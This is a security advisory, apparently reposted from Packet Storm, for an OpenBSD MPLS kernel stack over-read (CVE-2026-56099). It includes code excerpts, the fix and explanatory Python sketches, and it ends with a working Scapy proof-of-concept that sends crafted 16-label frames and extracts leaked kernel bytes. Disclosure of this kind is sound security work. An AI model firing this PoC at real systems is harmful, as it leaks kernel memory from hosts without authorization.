## https://sploitus.com/exploit?id=PACKETSTORM:223968
    ------------------------------------------------------------------------
    OpenBSD mpls_do_error: Remote Kernel Stack Disclosure via MPLS Label 
    Stack Over-read
    ------------------------------------------------------------------------
    
    Affected:  OpenBSD -current prior to 2026-06-18 (fixed in -current)
    Vendor:    OpenBSD
    Severity:  Medium
    Reporter:  Argus Systems
    Date:      2026-06-12
    CVE:       CVE-2026-56099
    
    
    1. SUMMARY
    ==========
    
    The mpls_do_error() function in sys/netmpls/mpls_input.c parses an
    incoming MPLS label stack into a fixed-size local array,
    struct shim_hdr stack[MPLS_INKERNEL_LOOP_MAX] (16 entries). When the
    parse loop completes without encountering the Bottom-of-Stack (BoS)
    label, nstk reaches MPLS_INKERNEL_LOOP_MAX (16). Several subsequent
    code paths then compute a copy length of (nstk + 1) * sizeof(*shim)
    -- 17 entries -- and use it with icmp_do_exthdr(), M_PREPEND(), and
    m_copyback() against the 16-entry stack object. This reads one
    struct shim_hdr (4 bytes) past the end of the array, and that data is
    reflected back to the sender inside the generated ICMP/MPLS error
    response.
    
    
    2. AFFECTED VERSIONS
    ====================
    
    The (nstk + 1) length computations against the 16-entry stack[] array
    were introduced with the ICMP/MPLS error path on 2010-09-13 (commit
    201d6983add, "First shot at ICMP error handling inside an MPLS path.
    Currently only TTL exceeded errors for IPv4 are handled."). The parse
    loop was bounded by MPLS_INKERNEL_LOOP_MAX (16), but nothing rejected
    a stack that ran to completion without a BoS bit, so nstk could reach
    16 and the subsequent (nstk + 1) reads accessed stack[16].
    
    Affected: OpenBSD -current prior to 2026-06-18 (mpls_input.c revisions
    before v1.82).
    
    
    3. DETAILS
    ==========
    
    Vulnerable code (sys/netmpls/mpls_input.c, mpls_do_error):
    
      struct shim_hdr stack[MPLS_INKERNEL_LOOP_MAX];   /* 16 entries */
      ...
      for (nstk = 0; nstk < MPLS_INKERNEL_LOOP_MAX; nstk++) {
          ...
          stack[nstk] = *mtod(m, struct shim_hdr *);
          m_adj(m, sizeof(*shim));
          if (MPLS_BOS_ISSET(stack[nstk].shim_label))
              break;
      }
      /* no guard: with no BoS bit set, nstk == 16 here */
    
      shim = &stack[0];
      ...
      case IPVERSION:
          ...
          if (icmp_do_exthdr(m, ICMP_EXT_MPLS, 1, stack,
              (nstk + 1) * sizeof(*shim)))
              return (NULL);
          ...
    
    MPLS_INKERNEL_LOOP_MAX is defined as 16 and sizeof(struct shim_hdr) is
    4. With nstk == 16, the icmp_do_exthdr() call is given a length of
    17 * 4 = 68 bytes for a 64-byte stack[] object, so it reads stack[16]
    -- one struct shim_hdr (4 bytes) of adjacent kernel stack -- and
    includes it in the response.
    
    The same (nstk + 1) length is later used to reserve room with
    M_PREPEND() and to copy the stack back onto the reflected packet with
    m_copyback():
    
      M_PREPEND(m, (nstk + 1) * sizeof(*shim), M_NOWAIT);
      ...
      m_copyback(m, 0, (nstk + 1) * sizeof(*shim), stack, M_NOWAIT);
    
    so the leaked entry also travels on the wire as the 17th MPLS shim
    header of the returned frame.
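
The length arithmetic above can be reproduced with a small Python model. This is an illustrative sketch, not kernel code: `parse_label_stack`, `copy_length`, and `overread_bytes` are hypothetical names, and the model assumes the input always holds at least 16 labels when no BoS bit is present (the mbuf length checks elided in the excerpt are not modelled).

```python
MPLS_INKERNEL_LOOP_MAX = 16  # array size quoted in the advisory
SHIM_SIZE = 4                # sizeof(struct shim_hdr) per the advisory


def parse_label_stack(bos_flags):
    """Return nstk as the unguarded parse loop would leave it.

    bos_flags[i] is True when label i carries the Bottom-of-Stack bit.
    """
    nstk = 0
    while nstk < MPLS_INKERNEL_LOOP_MAX:
        if bos_flags[nstk]:
            break  # BoS found: nstk is the index of the last label
        nstk += 1
    return nstk    # equals 16 when no label had the BoS bit


def copy_length(nstk):
    """Length handed to icmp_do_exthdr(), M_PREPEND() and m_copyback()."""
    return (nstk + 1) * SHIM_SIZE


def overread_bytes(nstk):
    """Bytes read past the end of the 16-entry stack[] array."""
    return max(0, copy_length(nstk) - MPLS_INKERNEL_LOOP_MAX * SHIM_SIZE)


if __name__ == "__main__":
    nstk = parse_label_stack([False] * 16)
    print(nstk, copy_length(nstk), overread_bytes(nstk))
```

A stack whose 16th label carries the BoS bit leaves nstk at 15 and a copy length of exactly 64 bytes, so only the no-BoS case crosses the array boundary.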
    
    
    4. REACHABILITY
    ===============
    
    The path is reachable remotely via mpls_input() -> mpls_do_error() on
    systems that have MPLS enabled on an interface. The trigger is a
    crafted MPLS frame (EtherType 0x8847) carrying 16 labels with no BoS
    bit set and an outermost label TTL of 1, so the TTL-exceeded error
    path is taken:
    
      mpls_input  (ttl <= 1)
        -> mpls_do_error(m, ICMP_TIMXCEED, ICMP_TIMXCEED_INTRANS, 0)
    
    The inner payload must be IPv4 so the IPVERSION branch is reached.
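
For illustration, the label stack portion of such a frame can be encoded with nothing but the standard library. The sketch below assumes the RFC 3032 shim layout (20-bit label, 3-bit traffic class, 1-bit BoS, 8-bit TTL) and reuses the label numbers (100 to 115) and inner TTL (64) from the attached PoC; `encode_shim` and `build_label_stack` are hypothetical helper names. It builds only the 64 bytes of shim headers, not the Ethernet header or the inner IPv4 payload.

```python
import struct

ETHERTYPE_MPLS = 0x8847  # MPLS unicast EtherType named in the advisory


def encode_shim(label, tc, bos, ttl):
    """Pack one 32-bit MPLS shim header in network byte order."""
    value = (label << 12) | (tc << 9) | (int(bos) << 8) | ttl
    return struct.pack("!I", value)


def build_label_stack(count=16, base_label=100):
    """Return `count` shim headers, none with BoS set, outermost TTL 1."""
    shims = []
    for i in range(count):
        ttl = 1 if i == 0 else 64  # only the outermost label expires
        shims.append(encode_shim(base_label + i, 0, False, ttl))
    return b"".join(shims)


if __name__ == "__main__":
    stack = build_label_stack()
    print(len(stack), stack[:8].hex())
```

Because the BoS bit is clear on every entry, a parser that walks this stack never sees a terminator within the first 16 labels.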
    
    
    5. IMPACT
    =========
    
    Each crafted packet leaks 4 bytes of kernel stack memory adjacent to
    the stack[] array. The leaked bytes are carried in the ICMP/MPLS
    extension object of the error response and again as the 17th shim
    header of the returned frame, so the sender can read them directly
    from the reply.
    
    
    6. PROOF OF CONCEPT
    ===================
    
    A Python/Scapy PoC sends a 16-label MPLS frame with no BoS bit set
    and an outermost label TTL of 1, then captures the reply. On a
    vulnerable kernel the reply carries 17 MPLS shim headers on the wire;
    the 17th (stack[16]) is the leaked kernel stack data.
    
    PoC:
    https://pop.argus-systems.ai/attachments/poc-008-mpls-stack-leak.py
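
A capture of the reply can be checked offline by slicing the MPLS payload into 4-byte shims. This is a minimal sketch, assuming the payload starts immediately after the 14-byte Ethernet header and that the reply carries the 17 shims described above; `decode_shim` and `leaked_entry` are hypothetical names.

```python
def decode_shim(chunk):
    """Split one 4-byte MPLS shim into its fields (RFC 3032 layout)."""
    val = int.from_bytes(chunk, "big")
    return {
        "label": val >> 12,
        "tc": (val >> 9) & 0x7,
        "bos": (val >> 8) & 0x1,
        "ttl": val & 0xFF,
    }


def leaked_entry(mpls_payload, stack_slots=16):
    """Return the 4 bytes in the slot after the first `stack_slots` shims.

    Returns None when the payload is too short to contain that slot.
    """
    start = stack_slots * 4
    end = start + 4
    if len(mpls_payload) < end:
        return None
    return mpls_payload[start:end]


if __name__ == "__main__":
    # Synthetic payload: 16 zeroed shims, a marker slot, then an IPv4 byte.
    sample = bytes(64) + b"\xde\xad\xbe\xef" + b"\x45"
    print(leaked_entry(sample).hex())
```

On a reply from a fixed kernel there is nothing to decode, because the guard drops the frame before an error response is built.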
    
    
    7. FIX
    ======
    
    Fixed in -current by mvs on 2026-06-18. The fix adds a guard that
    drops a label stack which runs to completion without a BoS bit, so
    the (nstk + 1) length computations are never reached with
    nstk == MPLS_INKERNEL_LOOP_MAX:
    
      if (nstk >= MPLS_INKERNEL_LOOP_MAX) {
          m_freem(m);
          return (NULL);
      }
    
    Fix commit (mpls_input.c v1.82):
    https://github.com/openbsd/src/commit/6a23123ec05f1eb29cfcaae0f3a468b2e1983cfd
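
The effect of the guard can be modelled in a few lines of Python. This is a sketch only: it assumes the check sits directly after the parse loop, `parse_with_guard` is a hypothetical name, and returning None stands in for the m_freem(m) / return (NULL) pair.

```python
MPLS_INKERNEL_LOOP_MAX = 16  # array size quoted in the advisory
SHIM_SIZE = 4                # sizeof(struct shim_hdr) per the advisory


def parse_with_guard(bos_flags):
    """Return nstk, or None when the stack is dropped for lacking BoS."""
    nstk = 0
    while nstk < MPLS_INKERNEL_LOOP_MAX:
        if bos_flags[nstk]:
            break
        nstk += 1
    if nstk >= MPLS_INKERNEL_LOOP_MAX:
        return None  # models the drop: no error response is generated
    return nstk


if __name__ == "__main__":
    for flags in ([False] * 16, [False] * 15 + [True]):
        nstk = parse_with_guard(flags)
        length = None if nstk is None else (nstk + 1) * SHIM_SIZE
        print(nstk, length)
```

With the guard in place the largest value that survives is nstk == 15, for which (nstk + 1) * 4 is exactly the 64 bytes the array holds.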
    
    
    8. TIMELINE
    ===========
    
      2026-06-12  Reported to security@openbsd.org with PoC
      2026-06-18  Fix committed to -current
    
    
    9. CREDIT
    =========
    
    Discovered and reported by Argus Systems (https://byteray.co.uk/).
    
    
    10. REFERENCES
    ==============
    
    Advisory:
      https://pop.argus-systems.ai/advisory/adv-040.html
    
    Proof of concept:
      https://pop.argus-systems.ai/attachments/poc-008-mpls-stack-leak.py
    
    Fix commit:
      https://github.com/openbsd/src/commit/6a23123ec05f1eb29cfcaae0f3a468b2e1983cfd
    
    
    --- packet storm poc attached ---
    
    #!/usr/bin/env python3
    """
    PoC for report-008: MPLS label stack OOB read in mpls_do_error.
    
    When 16 MPLS labels arrive with no BoS bit set and TTL expires,
    nstk reaches 16 and (nstk+1)*sizeof(shim_hdr) = 17 entries are
    passed to icmp_do_exthdr / m_copyback. The 17th entry (stack[16])
    is adjacent kernel stack memory, reflected back in the ICMP error's
    MPLS extension object.
    
    Setup required:
      Host:    tap0 at 192.168.100.1
      OpenBSD: vio0 at 192.168.100.2, mpls enabled
    
    OpenBSD setup commands (as root):
      # ifconfig vio0 192.168.100.2/24 mpls up
      # sysctl net.mpls.ttl=255
    
    Usage:
      sudo python3 poc-008-mpls-stack-leak.py [--iface tap0] [--dst 192.168.100.2]
    """
    
    import argparse
    import sys
    from scapy.all import Ether, IP, ICMP, sendp, sniff, get_if_hwaddr, get_if_list, srp, ARP
    from scapy.contrib.mpls import MPLS
    
    MPLS_INKERNEL_LOOP_MAX = 16
    
    
    def resolve_mac(dst_ip, iface, src_ip):
        ans, _ = srp(
            Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=dst_ip, psrc=src_ip),
            iface=iface, timeout=2, verbose=False
        )
        if not ans:
            return None
        return ans[0][1][ARP].hwsrc
    
    
    def build_trigger(dst_mac, src_mac, dst_ip, src_ip):
        """
        16 MPLS labels, no BoS on any, outermost TTL=1 so it expires on ingress.
        Inner IPv4 payload so mpls_do_error takes the IPVERSION branch.
        """
        inner = IP(src=src_ip, dst=dst_ip, ttl=64, proto=1) / ICMP()
    
        stack = None
        for i in range(MPLS_INKERNEL_LOOP_MAX - 1, -1, -1):
            ttl = 1 if i == 0 else 64
            lbl = MPLS(label=100 + i, s=0, ttl=ttl)
            stack = lbl / stack if stack else lbl
    
        return Ether(src=src_mac, dst=dst_mac, type=0x8847) / stack / inner
    
    
    def parse_extension(icmp_raw):
        # ICMP extensions follow 128 bytes of original datagram
        offset = 128
        if len(icmp_raw) <= offset:
            return None
        return icmp_raw[offset:]
    
    
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("--iface", default="tap0")
        parser.add_argument("--dst",   default="192.168.100.2")
        parser.add_argument("--src",   default="192.168.100.1")
        args = parser.parse_args()
    
        if args.iface not in get_if_list():
            print(f"ERROR: interface {args.iface} not found", file=sys.stderr)
            sys.exit(1)
    
        src_mac = get_if_hwaddr(args.iface)
    
        print(f"Resolving MAC for {args.dst}...")
        dst_mac = resolve_mac(args.dst, args.iface, args.src)
        if not dst_mac:
            print("ARP failed -- is the VM up and vio0 configured?")
            sys.exit(1)
        print(f"  {args.dst} is at {dst_mac}")
    
        pkt = build_trigger(dst_mac, src_mac, args.dst, args.src)
    
        # The kernel's mpls_do_error builds an ICMP error, prepends (nstk+1)=17
        # shim headers (one past the 16-entry stack[]), then mpls_input SWAPs
        # label 100->200 and sends it back as EtherType 0x8847. We capture that.
        from scapy.all import AsyncSniffer
        is_mpls_from_vm = lambda p: (
            p.haslayer('Ether') and
            p['Ether'].type == 0x8847 and
            p['Ether'].src == dst_mac
        )
        sniffer = AsyncSniffer(iface=args.iface, count=1, timeout=5,
                               lfilter=is_mpls_from_vm)
        sniffer.start()
    
        print(f"Sending {MPLS_INKERNEL_LOOP_MAX}-label no-BoS packet (outermost TTL=1)...")
        sendp(pkt, iface=args.iface, verbose=False)
    
        sniffer.join(timeout=5)
        replies = sniffer.results or []
    
        if not replies:
            print("\nNo MPLS reply received.")
            print("Fix: in the VM as root, swap the route:")
            print("  route delete -mpls -in 100 -pop -inet 192.168.100.1")
            print("  route add -mpls -in 100 -swap -out 200 -inet 192.168.100.1")
            return
    
        reply = replies[0]
        raw = bytes(reply)[14:]  # strip 14-byte Ethernet header
        print(f"\nMPLS reply received ({len(raw)} bytes)  [TRIGGER CONFIRMED]")
    
        # Wire packet structure (after Ethernet):
        #   [0]      label 200        — SWAP outgoing label (replaced stack[0]=100)
        #   [1..15]  labels 101–115   — stack[1..15], all s=0
        #   [16]     stack[16]        — OOB read: 4 bytes past the 64-byte stack[] array
        #   [17+]    inner IP/ICMP    — bytes misread as shims by this loop
        #
        # Expected labels 101-115 have raw 0x00065040 .. 0x00073040 pattern.
        # stack[16] will NOT match that pattern.
        EXPECTED_SHIMS = MPLS_INKERNEL_LOOP_MAX + 1  # 1 SWAP + 15 inner + 1 leaked
    
        print(f"\nMPLS shim headers (first {EXPECTED_SHIMS + 2} parsed):")
        offset = 0
        shim_count = 0
        ip_start = None
        while offset + 4 <= len(raw) and shim_count < EXPECTED_SHIMS + 2:
            chunk = raw[offset:offset+4]
            val   = int.from_bytes(chunk, 'big')
            label = (val >> 12) & 0xFFFFF
            s     = (val >> 8)  & 0x1
            ttl   =  val        & 0xFF
            if shim_count == 0:
                tag = "  (SWAP outgoing label)"
            elif shim_count == MPLS_INKERNEL_LOOP_MAX:
                # slot 16: 1 SWAP + 15 inner labels (101-115) = index 16 = stack[16]
                tag = "  <-- stack[16] LEAKED KERNEL STACK BYTES"
                leaked_bytes = chunk
            elif shim_count >= MPLS_INKERNEL_LOOP_MAX:
                tag = "  (inner IP header)"
                if ip_start is None:
                    ip_start = offset
            else:
                tag = ""
            print(f"  [{shim_count:2d}] label={label:<6} s={s} ttl={ttl:<3}  raw={chunk.hex()}{tag}")
            offset += 4
            shim_count += 1
            if s == 1 and ip_start is None:
                ip_start = offset
                break
    
        # The actual IP packet starts at offset 17*4 = 68 bytes (17 MPLS shims on wire)
        # regardless of how many the loop consumed.
        ip_offset = EXPECTED_SHIMS * 4  # 17 * 4 = 68
        if ip_start is None:
            ip_start = ip_offset
    
        # Verify: shim count in reply
        # A correct implementation would return NULL (no reply) or send <=16 shims.
        # Seeing 17 shims (SWAP + 15 inner + 1 leaked) proves the OOB read.
        oob_confirmed = shim_count > MPLS_INKERNEL_LOOP_MAX
        if oob_confirmed:
            # leaked_bytes was set when slot 16 was parsed in the loop above
            print(f"\nOOB READ CONFIRMED: stack[16] = {leaked_bytes.hex()}")
        else:
            print("\nNOT TRIGGERED")
    
    
    if __name__ == "__main__":
        main()